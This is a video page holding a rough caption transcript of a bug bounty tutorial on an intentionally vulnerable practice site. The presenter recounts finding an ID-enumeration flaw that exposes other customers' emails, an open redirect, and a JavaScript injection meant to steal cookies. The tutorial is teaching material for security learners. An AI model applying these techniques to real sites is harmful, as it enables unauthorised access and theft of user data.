Live Hacking Tutorial: How to Think Like a Bug Bounty Hunter

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
okay so hey guys what's up welcome to this new video so in today's video we're going to attack a Target like I would approach it in a big Bounty program or things like that so it's it's it's it's a Target that has like f abilities it's not a real Target but it's a real website that's that is online so everybody can try this out I'm going to try doing this like around 30 minutes try what I can find in those times if you guys want to see like me continue doing on this website just leave a comment down below and we'll go further on on this website but if you guys want to see like me approaching a new new Target or different things also just let me know and I will show you guys in the videos so enough about this and let's start do some hacking okay guys like this is the target we are going to approach first thing make sure you have your burp Suite on so uh we can capture some traffic and things like that so I'm going to turn this on and like the first thing I usually do is just approach this target like you would approach a normal website so we're just going to scroll about this website we're going to push some buttons and we're going to do things like that okay so let's just see this like this is fast fot hacking page uh we have fast food hacking and if you scroll a little bit down you can see like uh it's a button right here we can uh press this button and see where this button brings us okay we have this page what I'm going to do is I'm just going to trying using this so I'm just going to put in some uh basic things to try and Trigger uh capturing some data let's do this and let's press the button okay nothing special happens but first things first first I also want to go back to where we were uh so we go back to here and we can scroll down so we press this button we have test some functionality behind this button and we continue back on the first page we were so here is some CSS popups uh it's all not clickable so it's nothing interesting we can scroll down a little bit like we have Battle of the hackers we we find some uh hackers here let's scroll down some more because really nothing is clickable here okay we have some block thing and some JavaScript Carousel thing like again nothing is really much clickable here okay so we go back up first things we all we already checked out this book uh Now button so we go to the menu maybe we can find something in here in the menu uh let's scroll down let's just try and click like everything I'm just pushing buttons just to try and and Trigger something uh we see we go to menu that PHP so it's PHP page uh later we will see some of the webalizer and we scrolling down nothing clickable here okay no problem we have all locations okay nice okay what did we see that happening is something uh came up here return home so an extra button is appeared we can not click this what you can do probably is you can save names you find uh in a file uh really names what I like is team names so if you go you can open like notepad uh Notepad open here you can say this is fast fast food hacking hacking page and we find some team members and the team members are snowy and Sean so team members usually are a little bit more interesting because if you find some login things or things like that you can try and putting in those names from the team members okay but again nothing too interesting we cannot click anything here uh it's just going back to this location that's PHP page so it's it's not really interesting and we have this return home button we are back here uh so we did test this one we did test this one we can now do this login okay so normally first thing I do is like a normal user I want to register an account and that's functionality next thing I usually do is I make a second account and I compare some things about these accounts but like you see we cannot uh we cannot register an account so one thing we can do is we can say here we have found the user oh sorry Sean and we can try if there's some thing like oh this user exists but password is not right see if you can find like uh some uh if you can find some information I don't oops please make sure answer okay so first side nothing too special what we can do now our two things from here is we can already look through our uh burp and see every nice thing that we have found uh what we of course want to do maybe is we can uh set this one but the the thing what I want to do first is we're going to our Linux machine so we're going to log in on the Linux machine and we're just going to run a little scan behind so let's change directory uh that's me mega directory first fast food Change directory uh fast food and what we're going to do here is like we're going to scan this website so I'm going back to this this page oh sorry was a little bit too too I'm going back to this page we're going to copy this part and we go to the Linux machine and we're going to run a go Buster uh first let's set this one as a Target so export Target and let's just give this one for a second to the Target and let's clear this up maybe I can expand this just a little I hope you guys can see this good so just a go Buster uh against the target but the target is already like full htps and we don't need to go back to libraries only one and we can run it okay what this will do already in the background we have now the big text it will look for uh directories and things like that we maybe can use like you see it already found like this API pad so you can just put go in here and uh you're going to say Target URL uh directory found and then you can add this one here so we found Dash API this is like not the uh word list I use normally so I'm going to Quick Change this just to use the dur Buster D Buster and then I do normally the directory lower lowercase medium oh Direct okay wait I was typing a directory lowercase medium this one I use normally it's a little B bigger and it will find some more so again it's find to images API things like that just let this one run and next off we're going to check out like this part maybe what we can do is set this off for a second because sometimes Google keeps uh producing some things that are are not that interesting and probably what you want to do is you want to go to the Target and you just want to go to fast food hackings the first one because we opened this as a second one and what you can do is I'm going to delete like all these things for now because we don't need this for for this scope and we're going to open this part okay so again here you see it finds the API with some things we can look into this later uh but what I want to see right now is I want to see the things from here the engagement what we did okay so this is getting the page I want to see some interesting things uh we did a post right here we did this post I I'm I'm it's always interesting to see what we what we are doing with this post what you always see is here you have Battle of the hackers of no what we can do is we can send this one to the repeater already um and what you can do is like you can send this one see we have like a Content length of five and we get back in number okay really interesting but what happens when we change this to yes let's say change this to yes it's the same content length five nothing special seems to change okay okay what happens when we we leave this and we don't do this is it still going to work it's still going to work so okay that's maybe something we can play with later but what I always already think is interesting you get this part so we're getting a number uh so it's the reservation that we did make so that's that's interesting uh let's go back and let's continue after the post so we we get this get so it's going to say fast Qui hackings confirm PHP order and then it's going to show this order okay what is this uh this we can like copy this URL uh copy URL and we can go to this page okay and you see this is our order we did make uh so we did fake test DP but what we see when you go back to the burp you see this part this is very interesting because we can copy this we can put this in decoder bases because I think this is going to be base 64 we're going to decco this part and okay it's a number okay what I want to do right now is I want to change this number just like lower one or higher one probably what you want to do is lower one because you're going to be the last one that it's made this order this what you want to try to do is we're going to lower this one and we're going to encode this back as base and we get back this base 64 and I just want to copy everything of this okay copy this and we go back to this page and we're going to close this we go back to here sorry was a little and we go into the repeater we're going to oh I didn't send that one to the repeater my bad uh send this one to the repeater sorry so you send it first to the repeater you're going to check this one out you see this response you will probably see a username usern [Music] name and do you see and you see here the fake atest that be what we now going to do is we're going to change this one do the one we just created we're going to send this again and just to show you guys a little bit better what it's going to do probably is uh let's find the user again and we just find the idol you see I'm going to show you guys this way copy the URL we go back to here I'm going to face this one and like you see we just find like an email address probably what you want to do is find as much email addresses as you can so uh this are bookings emails and going to save this probably every every email you get you want to save what I would do if this was like a real Target and I want to look more into this you create a little program that creates a lot of IDs it's not that it's not that hard because you can you can easily do this in Python and then you will scan all the IDS and you will in the program you will F you will get all of these parts so how you can do this easily is to watch like to this form it's going to be in a form probably let me see okay it's not in a form so you looking for this inputs and what is this in the input I and in the from every input on this page you're going to uh extract this value from the fname the email yeah the date is like not that really important so you just make a little program we can do this if you guys want to see me creating this little program it's no problem I'm not going to do this in this video because I want to find some more bucks uh but you can ask me and I will show you how you can create the scraper to extract this data from a lot of IDs just automated as is a front project maybe I just make it I will just make a video about it because I think it's really interesting to see how you can automate these things I'm going to take a little sip of water okay next let's watch our scan for a second maybe it did find something no it just not find something really interesting I'm going to stop this right now uh it's image and API we can try like one more we can try like one more and that's a common text uh that's something a you nice nice you guys see like it's really important to run multiple scans like we found/ admin that's PHP I think that one is really interesting so again uh oh we find a robots. dxt so we have the uh Dash admin.php we have image I think it's not that interesting but let's save this for a second we have the index PHP who sorry and we found the robots That 160 okay what you also can do is like in here what I probably always do is I you uh you can use like this I normally use notion to take my notes but for this because I'm not going to take too much notes and I just want to show you guys a notepad but what you can do is like create a too and then we can say make python trer to find user booking user information let's say user info and what you probably want to do then is you I'm going to provide this one with the vulnerability link so I'm going to provide this one with this so I know okay on this URL oh yeah this was the base 64 this was an ID I can make my Python program for that so just to keep in mind but we find some interesting things so what we're going to do is we go back to this website uh we go to this page I'm going to turn on Burp street again because we found some new targets and I want to use my burp suite for this so first one I want to check out because I like it it's admin dphp PHP PP wow okay and see pag is not found okay maybe there's something more so what we can do again is we're going to do this we're going to change uh Target to this and we going to run this one again I want to run this one on it and maybe we can find some extra pages on this admin that PHP maybe there are some things we can find so but just scanning things never hurts okay but go back we found some more I think the robots uh the pxt is the next thing we need to look into robots.txt uh do I miss [Music] something okay oh okay admin the PHP of course it returns so let me really quick watch this one I want to see because I was on the wrong we get ah right here admin that PHP and it is a server okay we get some server information also really interesting to note already uh like this is not that important for a bug bount because if you cannot explode it it's not interesting but if you can explode it it's interesting what is this doing so what I me really fast I get this admin PHP okay okay and it redirects me somehow instantly back to this uh index PHP but right now here we can also find the robots txt Okay and we find again like two end points and let's add this one again here so we find Dash admin just admin and dash go okay interesting because you have an admin PHP and we have an admin page like no no I'm triggered and I want to just know like what is this admin page link and again it's a 44 not found but maybe we can if the scan is not oops we can say export Target we can delete the PHP we can save this and we can run this one again okay maybe we'll find something on the admin maybe it's something different just scan it always scan things we also have this API mpoint we will look into a little bit later okay next thing we want to go to the next page it's still my Bret is still on or still at is the go okay redirects us immediately well okay go not fine okay go PHP okay it's trying to redirect immediately uh so there's probably something wrong behind the scenes Let me when you see this this one is really interesting so what we want to do right here is let's look into that let's scroll scroll scroll bit down we go to go and we have this part okay we're going to send this one to the repeater so we're going to send this one more time send and it's saying invalid return URL supplied so it wants to redirect us so what we can try to do is you can try return score URL equals htps uh Das Dash google.be let's see what it's doing okay it's a 200k like nothing special change so we can do this but it's not working okay uh maybe we can try now it's a b bit bit of trial and error because you see like it it it wants a return URL so it wants something so now you need to think a little bit like a developer like return maybe they make it this way like I would do when I'm return you know but like this is like how you can name things in G underscores how you name things in Python uh so it's a little bit okay now you see there is a location [Music] edit so let's try this let's copy this part let's go back to here let's go to here let's spacee this let's turn this one off for a second because I don't want to get every data from Google right now okay nice so we did a second founding and that is a yeah a redirect we can use so what we can do with this is we can set send the link this link what I created here to a Target and oh the target is thinking oh nice I'm going to book bounty.com and I know that website I trust that website now it's the safe website but when we can change this and we can redirect the target to our evil website we can gain some information from the target we can steal cookies we can steal data we can make a hook we can do a lot of things so dangerous but there was something I don't really understand here like what is what is this what is this second part is this a second so we can maybe create like ant it's call type equals let's change this just by one let's send this one again okay something something changed now we got a JavaScript code that's that's pretty amazing uh so we can trigger JavaScript now I think so can we like if we do let's say let me oh we can now do this probably like you see we found some JavaScript code by changing this type I have no idea what this type is doing uh maybe we can like visit the copy this URL again and visit this page to see like if something changes in the no nothing Chang so it just it's a different if it is it it it triggers a different function or things like that so what we're going to try to do is because we have JavaScript here so JavaScript top location HRA and we can modify this I think we can use this to trigger some JavaScript let's say I want to create an alert I want to steal some cookies cookie from the target for oh sorry okay let's try and sentence and let's see this part so we have JavaScript okay this is nice but this will not work because we have this part behind this so can we comment this out maybe we also need to this line like with this yeah this looks better if if this part is not going to be like filter or anything uh somewhere uh let's copy this again and let's go back to here okay nice we just found an xxs for Ability okay this is amazing like this is really fun so what we did just recap the last few minutes we found this redirect that is not working uh on the page so when you go to this go page what we found with our uh in our robots at dxt we found admin and we found this go page if you go to this go page you will go to a redirect this found a redirect that can be exploited and found X sucess and the GS code changing change the type what I'm going to do with this part is we going to make a sub part for a second really important is that you understand understand your notes that's the most important thing and we're going to copy this again I'm going to just space it right here just like this so we understand this later on we can use this to wait to make a report and things like that but it's really important you understand the things while you type in here if you need more information take also screenshot I I always take SC screenshots uh normally and I paste them in my notion for this demo purpose I'm not doing this uh but always just take also screenshots it's a reminder if you go back to this uh one day later you may forget some things and then screen screen screenshots are really interesting okay we also found like this part here I'm always triggered when I see a gbt token uh we can copy this I don't understand what's going to be in of the in inside of it but okay it's out so we can do gbt Daio I use this tool a lot and we can just delete all this I'm going to paste this one and it's empty like you see another way to to see this is using burp suite and we can go to we can go to I don't have the extension okay okay the extension is off I'm going to turn that one off for a sec I'm going to turn the G back on back to repeater and normally I can now check things out uh let's send this one again send to repeater repeater hm okay extensions GT editor okay normally you also can use this gbt okay gbt editor here in line but there is something maybe I need to restart it I have no idea right now I I okay but you can use the gb. AO also do works really pretty pretty pretty nice no okay but no problem uh okay we so we find already like two things let's see how how long are we already in this video so maybe let's see if we find something here no nothing too special in this SC uh we did this I think like for this video we found like three forign abilities maybe we're going to keep it this way so we did find like the order thing with the ID uh we can change we find we find this for ability and we find like two V abilities in the return on the go page so you can first redirect to a malicious website and second of all you can also alert uh you can also use a payload that triggers some ex that triggers some JavaScript and you can perform in crossride regress forgery attack xxs xxs deack so we found some server information we found some of these things and maybe next time we will go further so we next time when we continue I also will show you guys like maybe how to make a spyon script I will make a I will make a full video of that so that would be nice yeah so this was this video just to give you guys a little bit information how you can approach and attack a Target so first of try to use the website as good as possible how a normal user would you do it click every button press everything and then you can scan a little and next really important is just see everything that is being found like and the images are found here now you can really play with this website and that's that's the beauty of it how you want to do it now we have found some information so next of what I probably next will do one of my favorite things next is this part next I would love to enumerate this API because I love API hacking it's it's it's it's it's it's a part of of web hacking but it's different approach you need to enumerate a lot of things it can take some time to find targets but if you find weaknesses in an API it can be really really dangerous so next up I think my Approach will be this API Target and making this python script to try and get as much information from users and things like that and maybe I can even try to see if these users have an account like why you can do that we found this one user that made an order does this user have an account like is this a username do we get a different response things like that okay there's no different respon so we don't have that much information but we can we can work on this but that's for the next video I hope you guys like this a little bit and I see you guys back in the next one bye
Info
Channel: CyberSquad
Views: 109,631
Rating: undefined out of 5
Keywords: bug bounty, hacking tutorial, cybersecurity, ethical hacking, bug hunting, penetration testing, security researcher, hacker, white hat hacker, infosec, computer security, SQL injection, XSS, CSRF, RCE, LFI, SSRF, open redirect, path traversal, file inclusion, denial of service, authentication bypass, authorization bypass, web application security, mobile security, API security, vulnerability research, bug bounty tips, bug bounty training, bug bounty tools, bug bounty programs
Id: EpJ8qvngs8c
Channel Id: undefined
Length: 33min 39sec (2019 seconds)
Published: Mon Nov 13 2023
Related Videos
Live Recon and Automation on Shopify's Bug Bounty Program with @TomNomNomDotCom
NahamSec
147K
Master Burp Suite Like A Pro In Just 1 Hour
Netsec Explained
30K
What Is an AI Anyway? | Mustafa Suleyman | TED
TED
351K
Learn Reverse Engineering (for hacking games)
cazz
918K
Live bug bounty hunting on Hackerone (Part 1)
gotr00t?
10K
NMAP Full Guide (You will never ask about NMAP again) #hackers #scanning #nmap
Hacker Joe
146K
I Played HackTheBox For 30 Days - Here's What I Learned
Grant Collins
268K
Easy $500 Vulnerabilities! // How To Bug Bounty
NahamSec
55K
How much money I made in my 1st year of bug bounty? Bounty vlog #4
Bug Bounty Reports Explained
128K
Cross-Site Scripting (XSS) Explained! // How to Bug Bounty
NahamSec
28K
Access Location, Camera & Mic of any Device 🌎🎤📍📷
zSecurity
2M
Hack like Mr Robot // WiFi, Bluetooth and Scada hacking
David Bombal
2.1M
How do hackers hide themselves? - staying anonymous online
Grant Collins
1.3M
This Hacker Makes $160K a Day ⁠— After He Got Out of Federal Prison🎙Darknet Diaries Ep. 60: dawgyg
Jack Rhysider
473K
Password Hacking in Kali Linux
John Hammond
722K
Live Bug Hunting For Beginners: Try to Find the Vulnerability on Live Domain | Bug Bounty | POC 2024
THE BBH
11K
SQL Injection Hacking Tutorial (Beginner to Advanced)
David Bombal
184K
17 Hacker Tools in 7 Minutes - ALL Hak5 Gear
Hak5
344K
Is this the best OSINT tool out there?!
stuffy24
282K
Get a Cybersecurity Job with no Experience
Empirical Training
5.8K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.